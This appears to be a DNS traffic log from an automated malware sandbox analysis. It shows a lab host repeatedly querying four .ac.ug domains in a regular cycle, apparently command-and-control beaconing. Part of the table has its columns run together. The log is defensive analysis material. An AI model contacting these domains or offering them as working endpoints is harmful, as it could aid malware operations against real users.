Jun 26, 2022 09:45:59.609529972 CEST           53      62643  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:00.972532034 CEST        54015         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:01.287909031 CEST           53      54015  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:01.302423000 CEST        54489         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:01.668832064 CEST           53      54489  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:01.692954063 CEST        52698         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:02.335402966 CEST           53      52698  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:03.387541056 CEST        61901         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:03.521174908 CEST           53      61901  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:04.861490011 CEST        58689         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:05.224469900 CEST           53      58689  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:05.263015985 CEST        50081         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:05.407883883 CEST           53      50081  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:05.412870884 CEST        49520         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:05.879934072 CEST           53      49520  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:06.900013924 CEST        65526         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:07.183330059 CEST           53      65526  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:08.484833956 CEST        52965         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:08.825110912 CEST           53      52965  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:08.830322981 CEST        52125         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:09.151824951 CEST           53      52125  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:09.172702074 CEST        63104         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:09.415802002 CEST           53      63104  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:10.499820948 CEST        55083         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:10.522844076 CEST           53      55083  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:12.819227934 CEST        58360         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:13.254749060 CEST           53      58360  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:13.285218000 CEST        59724         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:13.417113066 CEST           53      59724  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:13.464816093 CEST        56071         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:13.861335993 CEST           53      56071  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:14.922063112 CEST        60238         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:14.943308115 CEST           53      60238  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:16.272790909 CEST        61152         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:16.600392103 CEST           53      61152  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:16.648164988 CEST        49679         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:16.668729067 CEST           53      49679  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:16.694027901 CEST        60361         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:17.050290108 CEST           53      60361  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:18.078138113 CEST        64579         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:18.172508955 CEST           53      64579  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:19.661204100 CEST        49463         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:19.946038008 CEST           53      49463  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:19.972764015 CEST        55342         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:20.489490032 CEST           53      55342  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:20.527023077 CEST        62041         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:20.808574915 CEST           53      62041  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:21.836281061 CEST        62483         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:21.855746031 CEST           53      62483  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:23.232126951 CEST        55788         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:23.251566887 CEST           53      55788  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:23.258554935 CEST        62448         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:23.277683020 CEST           53      62448  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:23.283349037 CEST        58563         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:23.900996923 CEST           53      58563  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:24.919173002 CEST        57422         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:24.938805103 CEST           53      57422  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:26.186084986 CEST        64375         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:26.206334114 CEST           53      64375  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:26.214508057 CEST        63844         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:26.233730078 CEST           53      63844  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:26.238574028 CEST        57269         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:26.787453890 CEST           53      57269  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:27.820296049 CEST        49287         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:27.842549086 CEST           53      49287  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:29.162329912 CEST        64442         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:29.182220936 CEST           53      64442  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:29.200381994 CEST        56146         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:29.220069885 CEST           53      56146  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:29.253309011 CEST        50520         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:29.535430908 CEST           53      50520  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:31.247152090 CEST        56845         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:31.267640114 CEST           53      56845  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:32.667778969 CEST        55300         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:33.007348061 CEST           53      55300  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:33.015280008 CEST        51853         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:33.037226915 CEST           53      51853  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:33.043329000 CEST        62417         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:33.318209887 CEST           53      62417  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:34.348625898 CEST        62834         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:34.429868937 CEST           53      62834  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:35.806056023 CEST        61037         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:35.827079058 CEST           53      61037  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:35.834036112 CEST        58053         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:35.855199099 CEST           53      58053  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:35.862826109 CEST        56031         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:36.128879070 CEST           53      56031  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:37.149254084 CEST        58054         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:37.234436989 CEST           53      58054  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:38.397241116 CEST        59374         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:38.417606115 CEST           53      59374  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:38.421745062 CEST        49815         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:38.926244020 CEST           53      49815  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:38.943577051 CEST        52277         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:39.367716074 CEST           53      52277  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:40.389466047 CEST        49572         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:40.409852028 CEST           53      49572  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:41.557739019 CEST        56949         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:41.579132080 CEST           53      56949  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:41.592691898 CEST        61041         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:41.702279091 CEST           53      61041  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:41.707015991 CEST        54749         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:42.044704914 CEST           53      54749  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:43.057265997 CEST        53169         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:43.077081919 CEST           53      53169  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:44.241111040 CEST        57179         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:44.260705948 CEST           53      57179  8.8.8.8        192.168.2.6
Jun 26, 2022 09:46:44.268326998 CEST        55331         53  192.168.2.6    8.8.8.8
Jun 26, 2022 09:46:44.287756920 CEST           53      55331  8.8.8.8        192.168.2.6
                                                                    Jun 26, 2022 09:46:44.291924953 CEST6432553192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:44.559916019 CEST53643258.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:45.588435888 CEST5846853192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:45.608629942 CEST53584688.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:46.926189899 CEST5698453192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:46.948671103 CEST53569848.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:46.956815958 CEST5164053192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:46.984714985 CEST53516408.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:47.045470953 CEST6385253192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:47.373270035 CEST53638528.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:48.388694048 CEST5457053192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:48.407943964 CEST53545708.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:49.737145901 CEST5679353192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:49.756731033 CEST53567938.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:49.759732962 CEST6165153192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:49.778947115 CEST53616518.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:49.780446053 CEST5992553192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:50.115060091 CEST53599258.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:51.131019115 CEST6123653192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:51.151547909 CEST53612368.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:52.489573956 CEST4981153192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:52.510042906 CEST53498118.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:52.512449980 CEST6263953192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:52.535131931 CEST53626398.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:52.536928892 CEST5494553192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:52.786977053 CEST53549458.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:53.803354025 CEST5960353192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:53.820684910 CEST53596038.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:54.972790003 CEST5693953192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:54.992006063 CEST53569398.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:54.994334936 CEST5705953192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:55.012367964 CEST53570598.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:55.015356064 CEST5464753192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:55.273374081 CEST53546478.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:56.287367105 CEST5849053192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:56.363706112 CEST53584908.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:57.506583929 CEST5646553192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:57.528808117 CEST53564658.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:57.533893108 CEST6143653192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:57.558281898 CEST53614368.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:57.560184956 CEST5704853192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:57.833945036 CEST53570488.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:46:58.850754976 CEST5455853192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:46:58.872860909 CEST53545588.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:00.019772053 CEST5633353192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:00.037149906 CEST53563338.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:00.040926933 CEST5982453192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:00.062521935 CEST53598248.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:00.064255953 CEST6132853192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:00.309726000 CEST53613288.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:01.320076942 CEST5095953192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:01.341156960 CEST53509598.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:02.488662004 CEST5934453192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:02.832598925 CEST53593448.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:02.834417105 CEST5540353192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:02.853538036 CEST53554038.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:02.855746984 CEST5893853192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:03.110609055 CEST53589388.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:04.116741896 CEST5662553192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:04.133922100 CEST53566258.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:05.284356117 CEST5773153192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:05.592148066 CEST53577318.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:05.593838930 CEST4928253192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:05.879611015 CEST53492828.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:06.250915051 CEST6076053192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:06.517442942 CEST53607608.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:07.654623985 CEST6494153192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:07.788269043 CEST53649418.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:08.926732063 CEST5369053192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:09.216793060 CEST53536908.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:09.218846083 CEST6272353192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:09.236004114 CEST53627238.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:09.238074064 CEST5576053192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:09.571846008 CEST53557608.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:10.585858107 CEST6545253192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:10.603106976 CEST53654528.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:11.740303040 CEST6207953192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:12.141793966 CEST53620798.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:12.144227982 CEST5156653192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:12.163436890 CEST53515668.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:12.167809010 CEST5005053192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:12.589550972 CEST53500508.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:13.602176905 CEST5943953192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:13.621402979 CEST53594398.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:14.769234896 CEST6452953192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:14.788824081 CEST53645298.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:14.792699099 CEST5675953192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:15.098356962 CEST53567598.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:15.100631952 CEST6525253192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:15.432835102 CEST53652528.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:16.445960999 CEST6525053192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:16.467267990 CEST53652508.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:17.613542080 CEST6080153192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:17.630446911 CEST53608018.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:17.632636070 CEST6044653192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:17.920314074 CEST53604468.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:17.922254086 CEST5167153192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:18.181885004 CEST53516718.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:19.196216106 CEST5044253192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:19.217360020 CEST53504428.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:20.366450071 CEST5331453192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:20.387876034 CEST53533148.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:20.390060902 CEST6151653192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:20.411376953 CEST53615168.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:20.413465977 CEST5021353192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:20.685486078 CEST53502138.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:21.696197987 CEST6179353192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:21.717863083 CEST53617938.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:22.865897894 CEST5169953192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:22.973720074 CEST53516998.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:22.975537062 CEST5118553192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:22.995135069 CEST53511858.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:22.996891022 CEST5959453192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:23.260404110 CEST53595948.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:24.274667025 CEST5559153192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:24.294061899 CEST53555918.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:25.442476988 CEST5464653192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:25.462004900 CEST53546468.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:25.464106083 CEST6207053192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:25.483431101 CEST53620708.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:25.485399008 CEST6224353192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:25.728574991 CEST53622438.8.8.8192.168.2.6
                                                                    Jun 26, 2022 09:47:26.744364023 CEST6319853192.168.2.68.8.8.8
                                                                    Jun 26, 2022 09:47:26.764005899 CEST53631988.8.8.8192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 26, 2022 09:45:59.455624104 CEST | 192.168.2.6 | 8.8.8.8 | 0x98be | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:00.972532034 CEST | 192.168.2.6 | 8.8.8.8 | 0x629e | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:01.302423000 CEST | 192.168.2.6 | 8.8.8.8 | 0x8c38 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:01.692954063 CEST | 192.168.2.6 | 8.8.8.8 | 0xfc5b | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:03.387541056 CEST | 192.168.2.6 | 8.8.8.8 | 0x96b2 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:04.861490011 CEST | 192.168.2.6 | 8.8.8.8 | 0xad3d | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:05.263015985 CEST | 192.168.2.6 | 8.8.8.8 | 0xb7e9 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:05.412870884 CEST | 192.168.2.6 | 8.8.8.8 | 0x1817 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:06.900013924 CEST | 192.168.2.6 | 8.8.8.8 | 0x8ef1 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:08.484833956 CEST | 192.168.2.6 | 8.8.8.8 | 0xb4d | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:08.830322981 CEST | 192.168.2.6 | 8.8.8.8 | 0x6dc3 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:09.172702074 CEST | 192.168.2.6 | 8.8.8.8 | 0x3ad1 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:10.499820948 CEST | 192.168.2.6 | 8.8.8.8 | 0x4e28 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:12.819227934 CEST | 192.168.2.6 | 8.8.8.8 | 0x85c9 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:13.285218000 CEST | 192.168.2.6 | 8.8.8.8 | 0x2bbe | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:13.464816093 CEST | 192.168.2.6 | 8.8.8.8 | 0x2d75 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:14.922063112 CEST | 192.168.2.6 | 8.8.8.8 | 0x15d6 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:16.272790909 CEST | 192.168.2.6 | 8.8.8.8 | 0x3d72 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:16.648164988 CEST | 192.168.2.6 | 8.8.8.8 | 0x2cf7 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:16.694027901 CEST | 192.168.2.6 | 8.8.8.8 | 0x287e | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:18.078138113 CEST | 192.168.2.6 | 8.8.8.8 | 0x7860 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:19.661204100 CEST | 192.168.2.6 | 8.8.8.8 | 0x877b | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:19.972764015 CEST | 192.168.2.6 | 8.8.8.8 | 0xef63 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:20.527023077 CEST | 192.168.2.6 | 8.8.8.8 | 0xf017 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:21.836281061 CEST | 192.168.2.6 | 8.8.8.8 | 0xb0c3 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:23.232126951 CEST | 192.168.2.6 | 8.8.8.8 | 0xc28c | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:23.258554935 CEST | 192.168.2.6 | 8.8.8.8 | 0xc296 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:23.283349037 CEST | 192.168.2.6 | 8.8.8.8 | 0x5a53 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:24.919173002 CEST | 192.168.2.6 | 8.8.8.8 | 0xb170 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:26.186084986 CEST | 192.168.2.6 | 8.8.8.8 | 0x1c99 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:26.214508057 CEST | 192.168.2.6 | 8.8.8.8 | 0x86e5 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:26.238574028 CEST | 192.168.2.6 | 8.8.8.8 | 0xcd3 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:27.820296049 CEST | 192.168.2.6 | 8.8.8.8 | 0x62cc | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:29.162329912 CEST | 192.168.2.6 | 8.8.8.8 | 0x1261 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:29.200381994 CEST | 192.168.2.6 | 8.8.8.8 | 0xc2c3 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:29.253309011 CEST | 192.168.2.6 | 8.8.8.8 | 0x35a9 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:31.247152090 CEST | 192.168.2.6 | 8.8.8.8 | 0xa0ee | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:32.667778969 CEST | 192.168.2.6 | 8.8.8.8 | 0xa139 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:33.015280008 CEST | 192.168.2.6 | 8.8.8.8 | 0x5df0 | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:33.043329000 CEST | 192.168.2.6 | 8.8.8.8 | 0x8bc1 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:34.348625898 CEST | 192.168.2.6 | 8.8.8.8 | 0x944e | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:35.806056023 CEST | 192.168.2.6 | 8.8.8.8 | 0x7aaa | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:35.834036112 CEST | 192.168.2.6 | 8.8.8.8 | 0xafcb | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:35.862826109 CEST | 192.168.2.6 | 8.8.8.8 | 0x1721 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:37.149254084 CEST | 192.168.2.6 | 8.8.8.8 | 0x8619 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:38.397241116 CEST | 192.168.2.6 | 8.8.8.8 | 0x2497 | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:38.421745062 CEST | 192.168.2.6 | 8.8.8.8 | 0x118d | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:38.943577051 CEST | 192.168.2.6 | 8.8.8.8 | 0x2387 | Standard query (0) | parthaha.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:40.389466047 CEST | 192.168.2.6 | 8.8.8.8 | 0x7593 | Standard query (0) | nikahuve.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:41.557739019 CEST | 192.168.2.6 | 8.8.8.8 | 0xd5ea | Standard query (0) | kalskala.ac.ug | A (IP address) | IN (0x0001)
Jun 26, 2022 09:46:41.592691898 CEST | 192.168.2.6 | 8.8.8.8 | 0xe5dd | Standard query (0) | tuekisaa.ac.ug | A (IP address) | IN (0x0001)
